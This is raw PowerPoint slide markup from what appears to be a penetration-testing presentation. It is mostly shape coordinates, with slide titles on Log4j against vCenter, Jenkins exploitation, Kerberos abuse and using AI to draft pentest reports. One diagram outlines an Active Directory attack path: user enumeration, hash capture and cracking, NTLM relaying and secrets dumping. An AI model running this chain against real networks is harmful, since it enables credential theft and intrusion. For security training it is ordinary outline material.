              <a:gd name="connsiteX61" fmla="*/ 1217794 w 4251324"/>
              <a:gd name="connsiteY61" fmla="*/ 741086 h 3141684"/>
              <a:gd name="connsiteX62" fmla="*/ 1374066 w 4251324"/>
              <a:gd name="connsiteY62" fmla="*/ 529127 h 3141684"/>
              <a:gd name="connsiteX63" fmla="*/ 1592285 w 4251324"/>
              <a:gd name="connsiteY63" fmla="*/ 234804 h 3141684"/>
              <a:gd name="connsiteX64" fmla="*/ 2013540 w 4251324"/>
              <a:gd name="connsiteY64" fmla="*/ 325624 h 3141684"/>
              <a:gd name="connsiteX65" fmla="*/ 1936642 w 4251324"/>
              <a:gd name="connsiteY65" fmla="*/ 366128 h 3141684"/>
              <a:gd name="connsiteX66" fmla="*/ 1980276 w 4251324"/>
              <a:gd name="connsiteY66" fmla="*/ 448819 h 3141684"/>
              <a:gd name="connsiteX67" fmla="*/ 2155749 w 4251324"/>
              <a:gd name="connsiteY67" fmla="*/ 356271 h 3141684"/>
              <a:gd name="connsiteX68" fmla="*/ 2155749 w 4251324"/>
              <a:gd name="connsiteY68" fmla="*/ 356271 h 3141684"/>
              <a:gd name="connsiteX69" fmla="*/ 2169390 w 4251324"/>
              <a:gd name="connsiteY69" fmla="*/ 348936 h 3141684"/>
              <a:gd name="connsiteX70" fmla="*/ 2170558 w 4251324"/>
              <a:gd name="connsiteY70" fmla="*/ 348329 h 3141684"/>
              <a:gd name="connsiteX71" fmla="*/ 2170558 w 4251324"/>
              <a:gd name="connsiteY71" fmla="*/ 348329 h 3141684"/>
              <a:gd name="connsiteX72" fmla="*/ 2600082 w 4251324"/>
              <a:gd name="connsiteY72" fmla="*/ 116561 h 3141684"/>
              <a:gd name="connsiteX73" fmla="*/ 2979805 w 4251324"/>
              <a:gd name="connsiteY73" fmla="*/ 526324 h 3141684"/>
              <a:gd name="connsiteX74" fmla="*/ 3136216 w 4251324"/>
              <a:gd name="connsiteY74" fmla="*/ 696610 h 3141684"/>
              <a:gd name="connsiteX75" fmla="*/ 3204985 w 4251324"/>
              <a:gd name="connsiteY75" fmla="*/ 633448 h 3141684"/>
              <a:gd name="connsiteX76" fmla="*/ 3119492 w 4251324"/>
              <a:gd name="connsiteY76" fmla="*/ 540292 h 3141684"/>
              <a:gd name="connsiteX77" fmla="*/ 3406339 w 4251324"/>
              <a:gd name="connsiteY77" fmla="*/ 540292 h 3141684"/>
              <a:gd name="connsiteX78" fmla="*/ 3734438 w 4251324"/>
              <a:gd name="connsiteY78" fmla="*/ 947298 h 3141684"/>
              <a:gd name="connsiteX79" fmla="*/ 563184 w 4251324"/>
              <a:gd name="connsiteY79" fmla="*/ 947298 h 3141684"/>
              <a:gd name="connsiteX80" fmla="*/ 919968 w 4251324"/>
              <a:gd name="connsiteY80" fmla="*/ 2489035 h 3141684"/>
              <a:gd name="connsiteX81" fmla="*/ 375565 w 4251324"/>
              <a:gd name="connsiteY81" fmla="*/ 1040781 h 3141684"/>
              <a:gd name="connsiteX82" fmla="*/ 3874452 w 4251324"/>
              <a:gd name="connsiteY82" fmla="*/ 1040781 h 3141684"/>
              <a:gd name="connsiteX83" fmla="*/ 3331310 w 4251324"/>
              <a:gd name="connsiteY83" fmla="*/ 2489035 h 3141684"/>
              <a:gd name="connsiteX84" fmla="*/ 3120753 w 4251324"/>
              <a:gd name="connsiteY84" fmla="*/ 2489035 h 3141684"/>
              <a:gd name="connsiteX85" fmla="*/ 2686926 w 4251324"/>
              <a:gd name="connsiteY85" fmla="*/ 2331461 h 3141684"/>
              <a:gd name="connsiteX86" fmla="*/ 2529351 w 4251324"/>
              <a:gd name="connsiteY86" fmla="*/ 2489035 h 3141684"/>
              <a:gd name="connsiteX87" fmla="*/ 1720619 w 4251324"/>
              <a:gd name="connsiteY87" fmla="*/ 2489035 h 3141684"/>
              <a:gd name="connsiteX88" fmla="*/ 1286815 w 4251324"/>
              <a:gd name="connsiteY88" fmla="*/ 2331391 h 3141684"/>
              <a:gd name="connsiteX89" fmla="*/ 1129171 w 4251324"/>
              <a:gd name="connsiteY89" fmla="*/ 2489035 h 3141684"/>
              <a:gd name="connsiteX90" fmla="*/ 1191305 w 4251324"/>
              <a:gd name="connsiteY90" fmla="*/ 2627788 h 3141684"/>
              <a:gd name="connsiteX91" fmla="*/ 1424895 w 4251324"/>
              <a:gd name="connsiteY91" fmla="*/ 2394198 h 3141684"/>
              <a:gd name="connsiteX92" fmla="*/ 1658484 w 4251324"/>
              <a:gd name="connsiteY92" fmla="*/ 2627788 h 3141684"/>
              <a:gd name="connsiteX93" fmla="*/ 1424895 w 4251324"/>
              <a:gd name="connsiteY93" fmla="*/ 2861377 h 3141684"/>
              <a:gd name="connsiteX94" fmla="*/ 1191305 w 4251324"/>
              <a:gd name="connsiteY94" fmla="*/ 2627788 h 3141684"/>
              <a:gd name="connsiteX95" fmla="*/ 1448254 w 4251324"/>
              <a:gd name="connsiteY95" fmla="*/ 3048248 h 3141684"/>
              <a:gd name="connsiteX96" fmla="*/ 1121229 w 4251324"/>
              <a:gd name="connsiteY96" fmla="*/ 3048248 h 3141684"/>
              <a:gd name="connsiteX97" fmla="*/ 1121229 w 4251324"/>
              <a:gd name="connsiteY97" fmla="*/ 2954813 h 3141684"/>
              <a:gd name="connsiteX98" fmla="*/ 1448254 w 4251324"/>
              <a:gd name="connsiteY98" fmla="*/ 2954813 h 3141684"/>
              <a:gd name="connsiteX99" fmla="*/ 2289175 w 4251324"/>
              <a:gd name="connsiteY99" fmla="*/ 3048248 h 3141684"/>
              <a:gd name="connsiteX100" fmla="*/ 1962150 w 4251324"/>
              <a:gd name="connsiteY100" fmla="*/ 3048248 h 3141684"/>
              <a:gd name="connsiteX101" fmla="*/ 1962150 w 4251324"/>
              <a:gd name="connsiteY101" fmla="*/ 2954813 h 3141684"/>
              <a:gd name="connsiteX102" fmla="*/ 2289175 w 4251324"/>
              <a:gd name="connsiteY102" fmla="*/ 2954813 h 3141684"/>
              <a:gd name="connsiteX103" fmla="*/ 1868714 w 4251324"/>
              <a:gd name="connsiteY103" fmla="*/ 2861377 h 3141684"/>
              <a:gd name="connsiteX104" fmla="*/ 1653298 w 4251324"/>
              <a:gd name="connsiteY104" fmla="*/ 2861377 h 3141684"/>
              <a:gd name="connsiteX105" fmla="*/ 1751920 w 4251324"/>
              <a:gd name="connsiteY105" fmla="*/ 2627788 h 3141684"/>
              <a:gd name="connsiteX106" fmla="*/ 1748416 w 4251324"/>
              <a:gd name="connsiteY106" fmla="*/ 2582471 h 3141684"/>
              <a:gd name="connsiteX107" fmla="*/ 2501741 w 4251324"/>
              <a:gd name="connsiteY107" fmla="*/ 2582471 h 3141684"/>
              <a:gd name="connsiteX108" fmla="*/ 2498237 w 4251324"/>
              <a:gd name="connsiteY108" fmla="*/ 2627788 h 3141684"/>
              <a:gd name="connsiteX109" fmla="*/ 2596812 w 4251324"/>
              <a:gd name="connsiteY109" fmla="*/ 2861377 h 3141684"/>
              <a:gd name="connsiteX110" fmla="*/ 1868714 w 4251324"/>
              <a:gd name="connsiteY110" fmla="*/ 2861377 h 3141684"/>
              <a:gd name="connsiteX111" fmla="*/ 3130096 w 4251324"/>
              <a:gd name="connsiteY111" fmla="*/ 3048248 h 3141684"/>
              <a:gd name="connsiteX112" fmla="*/ 2803071 w 4251324"/>
              <a:gd name="connsiteY112" fmla="*/ 3048248 h 3141684"/>
              <a:gd name="connsiteX113" fmla="*/ 2803071 w 4251324"/>
              <a:gd name="connsiteY113" fmla="*/ 2954813 h 3141684"/>
              <a:gd name="connsiteX114" fmla="*/ 3130096 w 4251324"/>
              <a:gd name="connsiteY114" fmla="*/ 2954813 h 3141684"/>
              <a:gd name="connsiteX115" fmla="*/ 3971018 w 4251324"/>
              <a:gd name="connsiteY115" fmla="*/ 3048248 h 3141684"/>
              <a:gd name="connsiteX116" fmla="*/ 3643993 w 4251324"/>
              <a:gd name="connsiteY116" fmla="*/ 3048248 h 3141684"/>
              <a:gd name="connsiteX117" fmla="*/ 3643993 w 4251324"/>
              <a:gd name="connsiteY117" fmla="*/ 2954813 h 3141684"/>
              <a:gd name="connsiteX118" fmla="*/ 3971018 w 4251324"/>
              <a:gd name="connsiteY118" fmla="*/ 2954813 h 314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251324" h="3141684">
                <a:moveTo>
                  <a:pt x="4251325" y="2861377"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3053666" y="2861377"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3116716" y="2800013"/>
                  <a:pt x="3152287" y="2715771"/>
                  <a:pt x="3152287" y="2627788"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3152171" y="2612618"/>
                  <a:pt x="3150984" y="2597472"/>
                  <a:pt x="3148737" y="2582471"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3396061" y="2582471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3974241" y="1040781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4064453" y="1040781"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4090256" y="1040781"/>
                  <a:pt x="4111171" y="1019865"/>
                  <a:pt x="4111171" y="994063"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4111171" y="968261"/>
                  <a:pt x="4090256" y="947345"/>
                  <a:pt x="4064453" y="947345"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3854690" y="947345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3451328" y="446903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3033811" y="446903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2619704" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142014" y="257743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1553135" y="130623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1318705" y="446903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="846855" y="446903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="443166" y="947345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186871" y="947345"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="161070" y="947345"/>
                  <a:pt x="140154" y="968261"/>
                  <a:pt x="140154" y="994063"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="140154" y="1019865"/>
                  <a:pt x="161070" y="1040781"/>
                  <a:pt x="186871" y="1040781"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="275635" y="1040781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="855264" y="2582471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101327" y="2582471"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1099131" y="2597477"/>
                  <a:pt x="1097977" y="2612618"/>
                  <a:pt x="1097870" y="2627788"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1097851" y="2715776"/>
                  <a:pt x="1133422" y="2800027"/>
                  <a:pt x="1196491" y="2861377"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="2861377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2954813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186871" y="2954813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186871" y="3141684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700768" y="3141684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700768" y="2954813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1027793" y="2954813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1027793" y="3141684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1541689" y="3141684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1541689" y="2954813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1868714" y="2954813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1868714" y="3141684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2382611" y="3141684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2382611" y="2954813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2709636" y="2954813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2709636" y="3141684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3223532" y="3141684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3223532" y="2954813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3550557" y="2954813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3550557" y="3141684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4064453" y="3141684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4064453" y="2954813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4251325" y="2954813"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="607332" y="3048248"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="280307" y="3048248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280307" y="2954813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="607332" y="2954813"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2825262" y="2861377"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2696256" y="2861377"/>
                  <a:pt x="2591673" y="2756794"/>
                  <a:pt x="2591673" y="2627788"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2591673" y="2498781"/>
                  <a:pt x="2696256" y="2394198"/>
                  <a:pt x="2825262" y="2394198"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2954269" y="2394198"/>
                  <a:pt x="3058852" y="2498781"/>
                  <a:pt x="3058852" y="2627788"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3058698" y="2756734"/>
                  <a:pt x="2954208" y="2861223"/>
                  <a:pt x="2825262" y="2861377"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="891423" y="540339"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1249749" y="540339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1142625" y="685678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1217794" y="741086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1374066" y="529127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1592285" y="234804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2013540" y="325624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1936642" y="366128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1980276" y="448819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2155749" y="356271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2155749" y="356271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2169390" y="348936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2170558" y="348329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2170558" y="348329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2600082" y="116561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2979805" y="526324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3136216" y="696610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3204985" y="633448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3119492" y="540292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3406339" y="540292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3734438" y="947298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="563184" y="947298"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="919968" y="2489035"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="375565" y="1040781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3874452" y="1040781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3331310" y="2489035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3120753" y="2489035"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3044467" y="2325724"/>
                  <a:pt x="2850238" y="2255175"/>
                  <a:pt x="2686926" y="2331461"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2617541" y="2363873"/>
                  <a:pt x="2561764" y="2419650"/>
                  <a:pt x="2529351" y="2489035"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1720619" y="2489035"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1644361" y="2325710"/>
                  <a:pt x="1450141" y="2255128"/>
                  <a:pt x="1286815" y="2331391"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1217393" y="2363804"/>
                  <a:pt x="1161588" y="2419613"/>
                  <a:pt x="1129171" y="2489035"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1191305" y="2627788"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1191305" y="2498781"/>
                  <a:pt x="1295888" y="2394198"/>
                  <a:pt x="1424895" y="2394198"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1553901" y="2394198"/>
                  <a:pt x="1658484" y="2498781"/>
                  <a:pt x="1658484" y="2627788"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1658484" y="2756794"/>
                  <a:pt x="1553901" y="2861377"/>
                  <a:pt x="1424895" y="2861377"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1295949" y="2861223"/>
                  <a:pt x="1191459" y="2756734"/>
                  <a:pt x="1191305" y="2627788"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1448254" y="3048248"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1121229" y="3048248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1121229" y="2954813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1448254" y="2954813"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2289175" y="3048248"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1962150" y="3048248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1962150" y="2954813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2289175" y="2954813"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1868714" y="2861377"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1653298" y="2861377"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1716367" y="2800027"/>
                  <a:pt x="1751938" y="2715776"/>
                  <a:pt x="1751920" y="2627788"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1751798" y="2612618"/>
                  <a:pt x="1750626" y="2597477"/>
                  <a:pt x="1748416" y="2582471"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2501741" y="2582471"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2499508" y="2597477"/>
                  <a:pt x="2498336" y="2612618"/>
                  <a:pt x="2498237" y="2627788"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2498228" y="2715762"/>
                  <a:pt x="2533776" y="2800008"/>
                  <a:pt x="2596812" y="2861377"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1868714" y="2861377"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3130096" y="3048248"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2803071" y="3048248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2803071" y="2954813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3130096" y="2954813"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3971018" y="3048248"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3643993" y="3048248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3643993" y="2954813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3971018" y="2954813"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="46633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8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using a laptop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8538"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6493814" y="1027348"/>
            <a:ext cx="5691188" cy="4579937"/>
          </a:xfrm>
          <a:effectLst>
            <a:softEdge rad="647098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27520" y="1881578"/>
            <a:ext cx="5186840" cy="52778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NO CREDS? FEELING DESPERATE? TRY THESE OUT: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27520" y="2844635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VCENTER LOG4J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6998" y="30906"/>
            <a:ext cx="505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OTHER STUFF TO TRY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A9CBBA-0B5E-3E4A-5A61-D078A9D357E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727520" y="4100006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JENKINS EXPLOITATION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2A2B04-29F2-80A2-A333-2E6EB52CC40D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727520" y="5355492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KDC BAMBOOZLING</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3718485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using a laptop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8538"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6493814" y="1027348"/>
            <a:ext cx="5691188" cy="4579937"/>
          </a:xfrm>
          <a:effectLst>
            <a:softEdge rad="647098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27520" y="1881578"/>
            <a:ext cx="5186840" cy="52778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REPORTING IS BORING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27520" y="2844635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MAKE AN AI DO MOST OF IT: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1454764" y="277127"/>
            <a:ext cx="2155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STEP 3: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681975-4A54-0ABE-999E-6012195BA269}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727520" y="3472263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VULNERABILITY/RISK DESCRIPTION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9CBBA-0B5E-3E4A-5A61-D078A9D357E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727520" y="4100006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REMEDIATION SUGGESTIONS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2A2B04-29F2-80A2-A333-2E6EB52CC40D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727520" y="4727749"/>
            <a:ext cx="5186840" cy="91697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ood Times Rg" panose="020B0605020000020001" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>SOME LLM AI’s MAY BE OUT OF DATE - CHECK WORK AFTER FOR ISSUES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6DE30-CEC8-3349-2734-305F3F11DB03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7126842" y="277127"/>
            <a:ext cx="31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2147166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1454764" y="277127"/>
            <a:ext cx="2155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STEP 3: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11" name="Picture 2" descr="wi F">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D63B3B1-E1FA-9352-8C60-0F404ADBC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83B485-9C99-845A-9C04-58BD7FA61935}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4614743" y="504497"/>
            <a:ext cx="1241045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Get Hashes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4CF20-9A09-709C-87FD-A3FF45E1FF95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7208273" y="504497"/>
            <a:ext cx="1434175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Crack Offline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0C4DF7-DDE3-6111-8F3F-53DA0438E6A4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2700493" y="689163"/>
            <a:ext cx="191425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516EFA-81DA-2C2E-02B5-F7353B73FE80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2761436" y="1388835"/>
            <a:ext cx="16291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err="1"/>
              <a:t>NTLMRelayX.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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82C69AB-4A1C-0C39-D9C3-87C7325A15D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883345" y="703291"/>
            <a:ext cx="878091" cy="870210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7CFEB3-7072-6B60-A7CB-5CD89F831A97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6189149" y="1394146"/>
            <a:ext cx="155042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Admin Sessions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6F82A0-526A-04CF-9A21-FF8A1B658277}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8111150" y="1388835"/>
            <a:ext cx="168725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err="1"/>
              <a:t>Secretsdump.py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254E-32EB-3628-AAA1-6A04D60B66CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10088118" y="1388835"/>
            <a:ext cx="199125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Local Admin Hashes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6122E6-61CC-6906-3D93-E7C1FBD4FAF9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4390536" y="1573501"/>
            <a:ext cx="1798613" cy="531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11E9EB-D7F5-7508-B5E7-2193CB42B31C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 flipV="1">
            <a:off x="7739573" y="1573501"/>
            <a:ext cx="371577" cy="531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64C8AD-B054-663A-FF53-DF03CC0C08E2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9798407" y="1573501"/>
            <a:ext cx="289711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D7FE5C-28EB-A8DD-8CA5-6DE2867F859C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2074774" y="2341603"/>
            <a:ext cx="176138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User Enumeration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4AB1E1-00EB-D73C-C4C3-CC4A15E06086}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428845" y="2345277"/>
            <a:ext cx="133562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Null Sessions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B8C38D-E636-507C-D07E-EA79D4F44CAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428845" y="3041275"/>
            <a:ext cx="286007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Statistically Likely Usernames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755E72-09F7-1C3A-003A-8FF13C979C07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4335595" y="2341603"/>
            <a:ext cx="164493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Validated Users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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420A677A-38DF-1503-548A-85029692A583}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="29" idx="0"/>
            <a:endCxn id="27" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2242004" y="2327815"/>
            <a:ext cx="330340" cy="1096580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A42B602-033E-3036-BC1E-B76125430EAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="28" idx="3"/>
            <a:endCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1764467" y="2526269"/>
            <a:ext cx="310307" cy="367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E0FF49-C3C6-FFAE-F491-353E740379D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="27" idx="3"/>
            <a:endCxn id="30" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3836154" y="2526269"/>
            <a:ext cx="499441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66DA18C-D9A2-7B37-1990-69EBCA9BD0CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
